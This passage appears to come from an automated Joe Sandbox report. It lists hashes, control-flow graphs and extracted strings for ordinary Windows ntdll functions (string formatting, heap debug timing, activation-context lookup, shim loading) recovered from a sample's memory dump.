                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2b316a7317f7298b790f63c1dd5f8fb31aeee4bbb39e562508635c129402b73
                                                                        • Instruction ID: 677f201669a4062646810ca6630453a539e7e10a9871e3a5966323b9b47f53b6
                                                                        • Opcode Fuzzy Hash: f2b316a7317f7298b790f63c1dd5f8fb31aeee4bbb39e562508635c129402b73
                                                                        • Instruction Fuzzy Hash: 5190022160184442D25072994C44B0F410547F5202F95C01FA4157554CC91989559B31
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A3090 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6a056ae075fd2e98869267d8a0afded01fc91ea30cc139adb9c529cbe2082cdb
                                                                        • Instruction ID: cff6daf96994e9039f2fd9ae5e42f8ccbf060008ff1065b19305dd52b0f901f4
                                                                        • Opcode Fuzzy Hash: 6a056ae075fd2e98869267d8a0afded01fc91ea30cc139adb9c529cbe2082cdb
                                                                        • Instruction Fuzzy Hash: A190022164140802D25071998854707000687E4601F55C017A0025554D861A8A65AAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A4340 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b40754ff4f1ffe387ebdb17b7e7d0948df526aa40f61acb18d6865ced93985db
                                                                        • Instruction ID: 5b82e62594923dff4cfafdd0a455d79bebc25b8a37f986b3a4feffc6b62de137
                                                                        • Opcode Fuzzy Hash: b40754ff4f1ffe387ebdb17b7e7d0948df526aa40f61acb18d6865ced93985db
                                                                        • Instruction Fuzzy Hash: FA900231A0580012925071994CC4546400557F4301B55C017E0425554C8A188A569771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A4650 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6712d1a0913ac71434a6dd44afdb74c29f6366f7b83de0f885c2595f676364a8
                                                                        • Instruction ID: d6c397b366356d851229ba9b7278966255d05cfb04878533151e9a7777bdc8eb
                                                                        • Opcode Fuzzy Hash: 6712d1a0913ac71434a6dd44afdb74c29f6366f7b83de0f885c2595f676364a8
                                                                        • Instruction Fuzzy Hash: A8900261A0150042425071994C44406600557F5301395C11BA0555560C861C8955D679
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A2AD0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2bb77e00aa0df1bd81be79a723385354eaf15744118ed7463f225cfe68c3abfd
                                                                        • Instruction ID: 743f6c3f771d2f89f12fc8546bfe58f2d07f39659d9339e5bf9e68015d04881e
                                                                        • Opcode Fuzzy Hash: 2bb77e00aa0df1bd81be79a723385354eaf15744118ed7463f225cfe68c3abfd
                                                                        • Instruction Fuzzy Hash: A4900225611400030215B5990B44507004647E9351355C027F1016550CD62589619531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A2AF0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9192c4f7fe97ff460857f6c8ff4104a37b84c7e841bfaf8fbb55e2ae5a42928c
                                                                        • Instruction ID: 32949eb27b5eb04c7e6877d3d845c293477448a4336708c2c4ca3a99e226f1a8
                                                                        • Opcode Fuzzy Hash: 9192c4f7fe97ff460857f6c8ff4104a37b84c7e841bfaf8fbb55e2ae5a42928c
                                                                        • Instruction Fuzzy Hash: EC900225621400020255B5990A4450B044557EA351395C01BF1417590CC62589659731
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A2AB0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dddb114835f2f9b3ec31942561f3e8aa92218c6a868e3e4ccef1b990006dea0b
                                                                        • Instruction ID: 28b4618ad4b884f201d9499f79fac1a323dbb472bee3297b13eaf325b3352b76
                                                                        • Opcode Fuzzy Hash: dddb114835f2f9b3ec31942561f3e8aa92218c6a868e3e4ccef1b990006dea0b
                                                                        • Instruction Fuzzy Hash: 109002A1601540924610B2998844B0A450547F4201B55C01BE1055560CC5298951D535
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A2B60 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00de5891e8b1a63cf80539e61d26b42733565671f4b4afecba0640c228be9254
                                                                        • Instruction ID: 80ec724d558830ae3aabe78c18a4a49dcf3355973400a022a3517ad85c89f53d
                                                                        • Opcode Fuzzy Hash: 00de5891e8b1a63cf80539e61d26b42733565671f4b4afecba0640c228be9254
                                                                        • Instruction Fuzzy Hash: 6690026160240003421571994854616400A47F4201B55C027E1015590DC5298991A535
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A2BE0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09e0b30b0e0e91085cd7a8bd7d4a40e5ccb6d679ac90b77e58e07f15c39d294c
                                                                        • Instruction ID: cdb15a5865e3b33af5b7bfbafc4e1cc0ffccf9ebad6b2865418b7760054f45a2
                                                                        • Opcode Fuzzy Hash: 09e0b30b0e0e91085cd7a8bd7d4a40e5ccb6d679ac90b77e58e07f15c39d294c
                                                                        • Instruction Fuzzy Hash: 6790023160544842D25071994844A46001547E4305F55C017A0065694D96298E55FA71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 592 204a2890-204a28b3 593 204da4bc-204da4c0 592->593 594 204a28b9-204a28cc 592->594 593->594 595 204da4c6-204da4ca 593->595 596 204a28ce-204a28d7 594->596 597 204a28dd-204a28df 594->597 595->594 598 204da4d0-204da4d4 595->598 596->597 599 204da57e-204da585 596->599 600 204a28e1-204a28e5 597->600 598->594 601 204da4da-204da4de 598->601 599->597 602 204a28eb-204a28fa 600->602 603 204a2988-204a298e 600->603 601->594 604 204da4e4-204da4eb 601->604 605 204da58a-204da58d 602->605 606 204a2900-204a2905 602->606 607 204a2908-204a290c 603->607 608 204da4ed-204da4f4 604->608 609 204da564-204da56c 604->609 605->607 606->607 607->600 610 204a290e-204a291b 607->610 614 204da50b 608->614 615 204da4f6-204da4fe 608->615 609->594 613 204da572-204da576 609->613 611 204a2921 610->611 612 204da592-204da599 610->612 616 204a2924-204a2926 611->616 623 204da5a1-204da5c9 call 204b0050 612->623 613->594 617 204da57c call 204b0050 613->617 619 204da510-204da536 call 204b0050 614->619 615->594 618 204da504-204da509 615->618 620 204a2928-204a292a 616->620 621 204a2993-204a2995 616->621 636 204da55d-204da55f 617->636 618->619 619->636 627 204a292c-204a292e 620->627 628 204a2946-204a2966 call 204b0050 620->628 621->620 625 204a2997-204a29b1 call 204b0050 621->625 641 204a2969-204a2974 625->641 627->628 633 204a2930-204a2944 call 204b0050 627->633 628->641 633->628 638 204a2981-204a2985 636->638 641->616 643 204a2976-204a2979 641->643 643->623 644 204a297f 643->644 644->638
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: ebc17332ec561b29d670f1ae4dbe40deb4b081a7d7d18ae54461c15832305fc8
                                                                        • Instruction ID: 006f64c0cb95cae736f425c39c1ec82dff0cc266a405bcc7e4afaff34d00d42c
                                                                        • Opcode Fuzzy Hash: ebc17332ec561b29d670f1ae4dbe40deb4b081a7d7d18ae54461c15832305fc8
                                                                        • Instruction Fuzzy Hash: 4551DAB2A001167FCB10DBDC89E0A7EF7B8BB29605B20C269E854D7741D23CDF5097A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20512410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 645 20512410-20512433 646 20512439-2051243d 645->646 647 205124ec-205124ff 645->647 646->647 648 20512443-20512447 646->648 649 20512501-2051250a 647->649 650 20512513-20512515 647->650 648->647 652 2051244d-20512451 648->652 649->650 653 2051250c 649->653 651 20512517-2051251b 650->651 654 20512538-2051253e 651->654 655 2051251d-2051252c 651->655 652->647 656 20512457-2051245b 652->656 653->650 659 20512543-20512547 654->659 657 20512540 655->657 658 2051252e-20512536 655->658 656->647 660 20512461-20512468 656->660 657->659 658->659 659->651 661 20512549-20512556 659->661 662 205124b6-205124be 660->662 663 2051246a-20512471 660->663 666 20512564 661->666 667 20512558-20512562 661->667 662->647 668 205124c0-205124c4 662->668 664 20512473-2051247b 663->664 665 20512484 663->665 664->647 669 2051247d-20512482 664->669 670 20512489-205124ab call 204b0510 665->670 671 20512567-20512569 666->671 667->671 668->647 672 205124c6-205124ea call 204b0510 668->672 669->670 684 205124ae-205124b1 670->684 674 2051256b-2051256d 671->674 675 2051258d-2051258f 671->675 672->684 674->675 678 2051256f-2051258b call 204b0510 674->678 680 20512591-20512593 675->680 681 205125ae-205125d0 call 204b0510 675->681 691 205125d3-205125df 678->691 680->681 682 20512595-205125ab call 204b0510 680->682 681->691 682->681 688 20512615-20512619 684->688 691->671 692 205125e1-205125e4 691->692 693 20512613 692->693 694 205125e6-20512610 call 204b0510 692->694 693->688 694->693
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: d5bad69e4f2a40fcaf21727d09b603838a89091800c989ba2309c35a3988953b
                                                                        • Instruction ID: 2c1912442083e968500a30501b0314d1bfb57f74ca0701889c346247c52deb19
                                                                        • Opcode Fuzzy Hash: d5bad69e4f2a40fcaf21727d09b603838a89091800c989ba2309c35a3988953b
                                                                        • Instruction Fuzzy Hash: 0051F475A00645AEEB24DFD8C8D097EFFF9EB44205B10C859E495C7642E6B8EE90CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2053A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 828 2053a670-2053a6e9 call 20472410 * 2 RtlDebugPrintTimes 834 2053a89f-2053a8c4 call 204725b0 * 2 call 204a4c30 828->834 835 2053a6ef-2053a6fa 828->835 837 2053a724 835->837 838 2053a6fc-2053a709 835->838 839 2053a728-2053a734 837->839 841 2053a70b-2053a70d 838->841 842 2053a70f-2053a715 838->842 843 2053a741-2053a743 839->843 841->842 845 2053a7f3-2053a7f5 842->845 846 2053a71b-2053a722 842->846 847 2053a736-2053a73c 843->847 848 2053a745-2053a747 843->848 849 2053a81f-2053a821 845->849 846->839 851 2053a73e 847->851 852 2053a74c-2053a750 847->852 848->849 853 2053a827-2053a834 849->853 854 2053a755-2053a77d RtlDebugPrintTimes 849->854 851->843 857 2053a86c-2053a86e 852->857 858 2053a836-2053a843 853->858 859 2053a85a-2053a866 853->859 854->834 866 2053a783-2053a7a0 RtlDebugPrintTimes 854->866 857->849 862 2053a845-2053a849 858->862 863 2053a84b-2053a851 858->863 860 2053a87b-2053a87d 859->860 864 2053a870-2053a876 860->864 865 2053a87f-2053a881 860->865 862->863 867 2053a857 863->867 868 2053a96b-2053a96d 863->868 870 2053a8c7-2053a8cb 864->870 871 2053a878 864->871 869 2053a883-2053a889 865->869 866->834 876 2053a7a6-2053a7cc RtlDebugPrintTimes 866->876 867->859 868->869 873 2053a8d0-2053a8f4 RtlDebugPrintTimes 869->873 874 2053a88b-2053a89d RtlDebugPrintTimes 869->874 872 2053a99f-2053a9a1 870->872 871->860 873->834 879 2053a8f6-2053a913 RtlDebugPrintTimes 873->879 874->834 876->834 881 2053a7d2-2053a7d4 876->881 879->834 888 2053a915-2053a944 RtlDebugPrintTimes 879->888 882 2053a7f7-2053a80a 881->882 883 2053a7d6-2053a7e3 881->883 887 2053a817-2053a819 882->887 885 2053a7e5-2053a7e9 883->885 886 2053a7eb-2053a7f1 883->886 885->886 886->845 886->882 889 2053a81b-2053a81d 887->889 890 2053a80c-2053a812 887->890 888->834 894 2053a94a-2053a94c 888->894 889->849 891 2053a814 890->891 892 2053a868-2053a86a 890->892 891->887 892->857 895 2053a972-2053a985 894->895 896 2053a94e-2053a95b 894->896 897 2053a992-2053a994 895->897 898 2053a963-2053a969 896->898 899 2053a95d-2053a961 896->899 900 2053a987-2053a98d 897->900 901 2053a996 897->901 898->868 898->895 899->898 902 2053a99b-2053a99d 900->902 903 2053a98f 900->903 901->865 902->872 903->897
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: HEAP:
                                                                        • API String ID: 3446177414-2466845122
                                                                        • Opcode ID: 7a152a97c11702bb403a68eb54c3556990b5e9951d1ec0586677a21a80eef5c9
                                                                        • Instruction ID: 1d12485d620d63a3263b9cd79c48af93202cb73c61147d21b21d14674047f967
                                                                        • Opcode Fuzzy Hash: 7a152a97c11702bb403a68eb54c3556990b5e9951d1ec0586677a21a80eef5c9
                                                                        • Instruction Fuzzy Hash: 31A18872A046128FC705CF68C890A1ABBE5FF88750F15496DFA45DB321EB34ED42CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2047A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1362 2047a250-2047a26f 1363 2047a275-2047a291 1362->1363 1364 2047a58d-2047a594 1362->1364 1365 2047a297-2047a2a0 1363->1365 1366 204c79e6-204c79eb 1363->1366 1364->1363 1367 2047a59a-204c79bb 1364->1367 1365->1366 1368 2047a2a6-2047a2ac 1365->1368 1367->1363 1372 204c79c1-204c79c6 1367->1372 1370 2047a2b2-2047a2b4 1368->1370 1371 2047a6ba-2047a6bc 1368->1371 1370->1366 1373 2047a2ba-2047a2bd 1370->1373 1371->1373 1374 2047a6c2 1371->1374 1375 2047a473-2047a479 1372->1375 1373->1366 1376 2047a2c3-2047a2c6 1373->1376 1374->1376 1377 2047a2da-2047a2dd 1376->1377 1378 2047a2c8-2047a2d1 1376->1378 1381 2047a6c7-2047a6d0 1377->1381 1382 2047a2e3-2047a32b 1377->1382 1379 2047a2d7 1378->1379 1380 204c79cb-204c79d5 1378->1380 1379->1377 1384 204c79da-204c79e3 call 204ef290 1380->1384 1381->1382 1383 2047a6d6-204c79ff 1381->1383 1385 2047a330-2047a335 1382->1385 1383->1384 1384->1366 1388 2047a47c-2047a47f 1385->1388 1389 2047a33b-2047a343 1385->1389 1390 2047a485-2047a488 1388->1390 1391 2047a34f-2047a35d 1388->1391 1389->1391 1393 2047a345-2047a349 1389->1393 1394 2047a48e-2047a49e 1390->1394 1395 204c7a16-204c7a19 1390->1395 1391->1394 1397 2047a363-2047a368 1391->1397 1393->1391 1396 2047a59f-2047a5a8 1393->1396 1394->1395 1400 2047a4a4-2047a4ad 1394->1400 1398 2047a36c-2047a36e 1395->1398 1399 204c7a1f-204c7a24 1395->1399 1401 2047a5c0-2047a5c3 1396->1401 1402 2047a5aa-2047a5ac 1396->1402 1397->1398 1405 2047a374-2047a38c call 2047a6e0 1398->1405 1406 204c7a26 1398->1406 1407 204c7a2b 1399->1407 1400->1398 1403 204c7a01 1401->1403 1404 2047a5c9-2047a5cc 1401->1404 1402->1391 1408 2047a5b2-2047a5bb 1402->1408 1409 204c7a0c 1403->1409 1404->1409 1410 2047a5d2-2047a5d5 1404->1410 1415 2047a4b2-2047a4b9 1405->1415 1416 2047a392-2047a3ba 1405->1416 1406->1407 1412 204c7a2d-204c7a2f 1407->1412 1408->1398 1409->1395 1410->1402 1412->1375 1414 204c7a35 1412->1414 1417 2047a3bc-2047a3be 1415->1417 1418 2047a4bf-2047a4c2 1415->1418 1416->1417 1417->1412 1419 2047a3c4-2047a3cb 1417->1419 1418->1417 1420 2047a4c8-2047a4d3 1418->1420 1421 2047a3d1-2047a3d4 1419->1421 1422 204c7ae0 1419->1422 1420->1385 1423 2047a3e0-2047a3ea 1421->1423 1424 204c7ae4-204c7afc call 204ef290 1422->1424 1423->1424 1425 2047a3f0-2047a40c call 2047a840 1423->1425 1424->1375 1430 2047a5d7-2047a5e0 1425->1430 1431 2047a412-2047a417 1425->1431 1432 2047a5e2-2047a5eb 1430->1432 1433 2047a601-2047a603 1430->1433 1431->1375 1434 2047a419-2047a43d 1431->1434 1432->1433 1435 2047a5ed-2047a5f1 1432->1435 1436 2047a605-2047a623 call 20464508 1433->1436 1437 2047a629-2047a631 1433->1437 1438 2047a440-2047a443 1434->1438 1439 2047a5f7-2047a5fb 1435->1439 1440 2047a681-2047a6ab RtlDebugPrintTimes 1435->1440 1436->1375 1436->1437 1442 2047a449-2047a44c 1438->1442 1443 2047a4d8-2047a4dc 1438->1443 1439->1433 1439->1440 1440->1433 1458 2047a6b1-2047a6b5 1440->1458 1444 2047a452-2047a454 1442->1444 1445 204c7ad6 1442->1445 1447 2047a4e2-2047a4e5 1443->1447 1448 204c7a3a-204c7a42 1443->1448 1449 2047a520-2047a539 call 2047a6e0 1444->1449 1450 2047a45a-2047a461 1444->1450 1445->1422 1452 2047a634-2047a64a 1447->1452 1454 2047a4eb-2047a4ee 1447->1454 1448->1452 1453 204c7a48-204c7a4c 1448->1453 1468 2047a53f-2047a567 1449->1468 1469 2047a65e-2047a665 1449->1469 1456 2047a467-2047a46c 1450->1456 1457 2047a57b-2047a582 1450->1457 1459 2047a4f4-2047a50c 1452->1459 1460 2047a650-2047a659 1452->1460 1453->1452 1461 204c7a52-204c7a5b 1453->1461 1454->1442 1454->1459 1456->1375 1464 2047a46e 1456->1464 1457->1423 1465 2047a588 1457->1465 1458->1433 1459->1442 1462 2047a512-2047a51b 1459->1462 1460->1444 1466 204c7a5d-204c7a60 1461->1466 1467 204c7a85-204c7a87 1461->1467 1462->1444 1464->1375 1465->1422 1471 204c7a6e-204c7a71 1466->1471 1472 204c7a62-204c7a6c 1466->1472 1467->1452 1470 204c7a8d-204c7a96 1467->1470 1475 2047a569-2047a56b 1468->1475 1469->1475 1476 2047a66b-2047a66e 1469->1476 1470->1444 1473 204c7a7e 1471->1473 1474 204c7a73-204c7a7c 1471->1474 1477 204c7a81 1472->1477 1473->1477 1474->1470 1475->1456 1478 2047a571-2047a573 1475->1478 1476->1475 1479 2047a674-2047a67c 1476->1479 1477->1467 1480 204c7a9b-204c7aa4 1478->1480 1481 2047a579 1478->1481 1479->1438 1480->1481 1482 204c7aaa-204c7ab0 1480->1482 1481->1457 1482->1481 1483 204c7ab6-204c7abe 1482->1483 1483->1481 1484 204c7ac4-204c7acf 1483->1484 1484->1483 1485 204c7ad1 1484->1485 1485->1481
                                                                        Strings
                                                                        • Actx , xrefs: 204C7A0C, 204C7A73
                                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 204C79D5
                                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 204C79FA
                                                                        • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 204C7AE6
                                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 204C79D0, 204C79F5
                                                                        • SsHd, xrefs: 2047A3E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                        • API String ID: 0-1988757188
                                                                        • Opcode ID: c55021c1d25380bbc56e3bcb1ab4f73e699cdbbf1cb1a22c7faea28e578c135a
                                                                        • Instruction ID: ed9c0e71df2d69be1600eb48a25191d3cec9bc780e615c4e6f327edaa1ae6643
                                                                        • Opcode Fuzzy Hash: c55021c1d25380bbc56e3bcb1ab4f73e699cdbbf1cb1a22c7faea28e578c135a
                                                                        • Instruction Fuzzy Hash: 05E1AE716043028FD714CFA4C884B9AB7F5BBC4254F14CA2EE9A5CB3A1D73ADD558B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204565B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 204B9AC5, 204B9B06
                                                                        • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 204B9AB4
                                                                        • LdrpLoadShimEngine, xrefs: 204B9ABB, 204B9AFC
                                                                        • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 204B9AF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
